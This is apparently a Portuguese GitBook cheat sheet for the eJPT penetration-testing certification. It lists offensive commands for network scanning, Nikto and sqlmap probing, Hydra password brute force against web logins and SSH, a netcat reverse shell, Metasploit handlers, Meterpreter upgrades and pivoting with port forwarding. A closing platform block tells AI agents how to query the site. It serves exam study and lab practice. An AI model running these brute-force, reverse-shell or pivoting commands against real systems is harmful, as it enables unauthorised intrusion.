> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/useful-resources/certifications/ejpt-certification-practical-guide.md).

# Guia prático para certificação eJPT

{% hint style="danger" %}
O **eJPT (eLearnSecurity Junior Penetration Tester)** é uma certificação de entrada em pentesting proposta pela eLearnSecurity. Ela valida habilidades fundamentais de teste de intrusão, incluindo reconhecimento de vulnerabilidades, exploração e pós-exploração. O exame é **prático** e consiste em comprometer um ambiente simulado, sendo ideal para iniciantes que desejam demonstrar suas habilidades de cibersegurança ofensiva.
{% endhint %}

{% embed url="<https://security.ine.com/certifications/ejpt-certification/>" %}

## Reconhecimento

### **Varredura de rede**

Escaneando equipamentos em uma rede:

```bash
nmap -sn 10.10.10.10/24
arp-scan -l
masscan 10.10.10.10/24 -p1-65535 --rate=10000
```

Escaneando portas abertas em equipamentos específicos:

{% code overflow="wrap" %}

```bash
nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10
rustscan -a 10.10.10.10 --ulimit 5000
```

{% endcode %}

Escaneando portas abertas em vários dispositivos:

{% code overflow="wrap" %}

```bash
nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10,20,30,36 -oG allPorts
```

{% endcode %}

Extração de portas abertas:

{% code overflow="wrap" %}

```bash
grep '[0-9]' allPorts | cut -d '/' -f1 | sort -u | xargs | tr ' '  ','
```

{% endcode %}

* Exemplo de saída : `22,80,135,445,9543,2214`

Varredura detalhada das versões dos serviços detectados:

```bash
nmap --open -sCV -p 22,80,135,445,9543,2214 10.10.10.10,20,30,36 -oN targeted
```

**Ping Sweep em uma rede Linux**

```bash
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
```

### **Análise de vulnerabilidades**

Varredura de vulnerabilidades web com Nikto:

```bash
nikto -url http://website.com
```

Detectando vulnerabilidades SQL com SQLmap:

```bash
sqlmap -r request --dbs
```

Varredura de vulnerabilidades SMB:

```bash
nmap -p445 --script"smb-vuln-*" 10.10.10.10
enum4linux -a 10.10.10.10
crackmapexec smb 10.10.10.10 --shares
```

## Exploração

#### **Ataque de força bruta com Hydra**

**Painel de login:**

{% code overflow="wrap" %}

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/admin/admin.php:username=^USER^&password=^PASS^:Incorrect" -t 64 -F
```

{% endcode %}

**Força bruta em SSH com Hydra:**

```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
```

## Metasploit – Pivoting e pós-exploração

### Shell reversa do Metasploit

**Usando o Metasploit para obter acesso**

```bash
msfconsole
```

Configuração do listener:

```bash
use multi/handler
set LHOST 10.10.10.10
set LPORT 443
run
```

Enviando uma shell reversa com Netcat:

```bash
nc 10.10.10.10 443 -e /bin/bash
```

Sessão em segundo plano:

```bash
sessions
```

### Metasploit para Meterpreter

**Método 1 - Convertendo uma shell em Meterpreter**

Carregando o módulo de conversão:

```bash
use shell_to_meterpreter
```

Configuração da sessão e da porta:

```bash
set LHOST 10.10.10.10
set lport 443
set session 1
```

Interação com a sessão do Meterpreter:

```bash
sessions -i 2
```

Adicionando uma rota para acessar outro segmento de rede:

```bash
route add 192.168.100.0/24 2
```

**Método 2 - Usando o Highway**

* Carregue o `autoroute` módulo:

```bash
use multi/manage/autoroute
```

Configuração da sessão e execução:

```bash
set session 2
run
```

**Varredura de rede a partir do Metasploit**

* Escaneando as portas de uma máquina pivotada:

```bash
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.100.21
run
```

### **Redirecionamento de portas no Metasploit**

* Adicionado um redirecionamento de porta para acessar um serviço remoto:

```bash
sessions -i 2
portfwd add -l 8080 -p 80 -r 192.168.100.21
```

Lista de regras de redirecionamento:

```bash
portfwd
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/useful-resources/certifications/ejpt-certification-practical-guide.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
